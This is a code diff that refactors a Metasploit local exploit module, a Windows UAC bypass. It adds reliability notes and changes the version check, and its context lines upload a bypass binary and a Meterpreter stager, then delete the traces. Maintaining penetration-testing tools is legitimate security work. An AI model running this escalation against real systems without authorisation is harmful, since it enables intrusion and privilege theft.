@@ -44,6 +44,11 @@ class MetasploitModule < Msf::Exploit::Local
               stdapi_sys_process_kill
             ]
           }
+        },
+        'Notes' => {
+          'Reliability' => UNKNOWN_RELIABILITY,
+          'Stability' => UNKNOWN_STABILITY,
+          'SideEffects' => UNKNOWN_SIDE_EFFECTS
         }
       )
     )
@@ -51,7 +56,7 @@ class MetasploitModule < Msf::Exploit::Local
     register_options([
       OptEnum.new('TECHNIQUE', [
         true, 'Technique to use if UAC is turned off',
-        'EXE', %w(PSH EXE)
+        'EXE', %w[PSH EXE]
       ]),
     ])
   end
@@ -64,12 +69,10 @@ class MetasploitModule < Msf::Exploit::Local
     if admin_group.nil?
       print_error('Either whoami is not there or failed to execute')
       print_error('Continuing under assumption you already checked...')
+    elsif admin_group
+      print_good('Part of Administrators group! Continuing...')
     else
-      if admin_group
-        print_good('Part of Administrators group! Continuing...')
-      else
-        fail_with(Failure::NoAccess, 'Not in admins group, cannot escalate with this module')
-      end
+      fail_with(Failure::NoAccess, 'Not in admins group, cannot escalate with this module')
     end
 
     if get_integrity_level == INTEGRITY_LEVEL_SID[:low]
@@ -107,16 +110,16 @@ class MetasploitModule < Msf::Exploit::Local
     session.sys.process.kill(pid)
     # delete the uac bypass payload
     file_rm(path_bypass)
-    file_rm("#{expand_path("%TEMP%")}\\tior.exe")
-    cmd_exec('cmd.exe', "/c del \"#{expand_path("%TEMP%")}\\w7e*.tmp\"")
+    file_rm("#{expand_path('%TEMP%')}\\tior.exe")
+    cmd_exec('cmd.exe', "/c del \"#{expand_path('%TEMP%')}\\w7e*.tmp\"")
   end
 
   def path_bypass
-    @bypass_path ||= "#{expand_path("%TEMP%")}\\#{Rex::Text.rand_text_alpha((rand(8) + 6))}.exe"
+    @path_bypass ||= "#{expand_path('%TEMP%')}\\#{Rex::Text.rand_text_alpha(rand(6..13))}.exe"
   end
 
   def path_payload
-    @payload_path ||= "#{expand_path("%TEMP%")}\\#{Rex::Text.rand_text_alpha((rand(8) + 6))}.exe"
+    @path_payload ||= "#{expand_path('%TEMP%')}\\#{Rex::Text.rand_text_alpha(rand(6..13))}.exe"
   end
 
   def upload_binaries!
@@ -137,7 +140,7 @@ class MetasploitModule < Msf::Exploit::Local
       #
       # Upload UAC bypass to the filesystem
       #
-      upload_file("#{path_bypass}", bpexe)
+      upload_file(path_bypass.to_s, bpexe)
       print_status("Meterpreter stager executable #{payload.length} bytes long being uploaded..")
 
       write_file(path_payload, payload)
@@ -159,24 +162,21 @@ class MetasploitModule < Msf::Exploit::Local
   end
 
   def validate_environment!
-    fail_with(Failure::None, 'Already in elevated state') if is_admin? or is_system?
+    fail_with(Failure::None, 'Already in elevated state') if is_admin? || is_system?
     #
     # Verify use against Vista+
     #
-    winver = sysinfo['OS']
-
-    unless winver =~ /Windows Vista|Windows 2008|Windows [78]/
-      fail_with(Failure::NotVulnerable, "#{winver} is not vulnerable.")
+    version = get_version_info
+    unless version.build_number.between?(Msf::WindowsVersion::Vista_SP0, Msf::WindowsVersion::Win81)
+      fail_with(Failure::NotVulnerable, "#{version.product_name} is not vulnerable.")
     end
 
     if is_uac_enabled?
       print_status 'UAC is Enabled, checking level...'
+    elsif is_in_admin_group?
+      fail_with(Failure::Unknown, 'UAC is disabled and we are in the admin group so something has gone wrong...')
     else
-      if is_in_admin_group?
-        fail_with(Failure::Unknown, 'UAC is disabled and we are in the admin group so something has gone wrong...')
-      else
-        fail_with(Failure::NoAccess, 'Not in admins group, cannot escalate with this module')
-      end
+      fail_with(Failure::NoAccess, 'Not in admins group, cannot escalate with this module')
     end
   end
 end
